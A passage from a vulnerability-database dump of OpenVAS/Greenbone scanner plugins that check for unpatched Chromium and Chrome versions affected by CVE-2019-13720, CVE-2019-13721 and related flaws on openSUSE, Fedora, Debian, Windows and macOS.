by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852760\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-03 03:00:38 +0000 (Sun, 03 Nov 2019)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2019:2421-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2421-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-11/msg00001.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2019:2421-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes 
the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n\n * CVE-2019-13720: Use-after-free in audio\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2421=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2421=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, 
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:33:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815825", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815825", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815825\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to\n\n - A use-after-free error in PDFium.\n\n - A use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 78.0.3904.87 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:31:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815823", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it 
under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815823\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to\n\n - A use-after-free error in PDFium.\n\n - A use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome 
version\n 78.0.3904.87 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T15:44:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5871", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-5870", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13675", "CVE-2019-5874", "CVE-2019-13667"], "description": "The remote host is missing 
an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-17T00:00:00", "id": "OPENVAS:1361412562310877007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877007", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-8508d74523", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877007\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\", \"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", 
\"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-17 03:31:03 +0000 (Sun, 17 Nov 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-8508d74523\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-8508d74523\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E4PBGVMZ355Z7XR6CLI4W42NBIXY3JHS\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-8508d74523 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", 
rpm:\"chromium~78.0.3904.87~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T15:41:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5871", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-5870", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13675", "CVE-2019-5874", "CVE-2019-13667"], "description": "The remote host is missing an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-17T00:00:00", "id": "OPENVAS:1361412562310877015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877015", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-2fa7552273", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877015\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\", \"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-17 03:32:23 +0000 (Sun, 17 Nov 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-2fa7552273\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2fa7552273\");\n 
script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZTDUMER334IGKQEKTUQHRW5PUGM6YINZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-2fa7552273 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-09T15:52:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", 
"CVE-2019-13713", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13709", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13697", "CVE-2019-13708", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-13667", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "The remote host is missing an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-12T00:00:00", "id": "OPENVAS:1361412562310704562", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704562", "type": "openvas", "title": "Debian Security Advisory DSA 4562-1 (chromium - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704562\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13685\", \"CVE-2019-13686\", \"CVE-2019-13687\", \"CVE-2019-13688\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13693\", \"CVE-2019-13694\", \"CVE-2019-13695\", \"CVE-2019-13696\", \"CVE-2019-13697\", \"CVE-2019-13699\", \"CVE-2019-13700\", \"CVE-2019-13701\", \"CVE-2019-13702\", \"CVE-2019-13703\", \"CVE-2019-13704\", \"CVE-2019-13705\", \"CVE-2019-13706\", \"CVE-2019-13707\", \"CVE-2019-13708\", \"CVE-2019-13709\", \"CVE-2019-13710\", \"CVE-2019-13711\", \"CVE-2019-13713\", \"CVE-2019-13714\", \"CVE-2019-13715\", \"CVE-2019-13716\", \"CVE-2019-13717\", \"CVE-2019-13718\", \"CVE-2019-13719\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5869\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n 
script_tag(name:\"creation_date\", value:\"2019-11-12 03:00:49 +0000 (Tue, 12 Nov 2019)\");\n script_name(\"Debian Security Advisory DSA 4562-1 (chromium - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4562.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4562-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the DSA-4562-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2019-5869\nZhe Jin discovered a use-after-free issue.\n\nCVE-2019-5870\nGuang Gong discovered a use-after-free issue.\n\nCVE-2019-5871\nA buffer overflow issue was discovered in the skia library.\n\nCVE-2019-5872\nZhe Jin discovered a use-after-free issue.\n\nCVE-2019-5874\nJames Lee discovered an issue with external Uniform Resource Identifiers.\n\nCVE-2019-5875\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-5876\nMan Yue Mo discovered a use-after-free issue.\n\nCVE-2019-5877\nGuang Gong discovered an out-of-bounds read issue.\n\nCVE-2019-5878\nGuang Gong discovered an use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2019-5879\nJinseo Kim discover that extensions could read files on the local\nsystem.\n\nCVE-2019-5880\nJun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13659\nLnyas Zhang discovered a URL spoofing issue.\n\nCVE-2019-13660\nWenxu Wu discovered a 
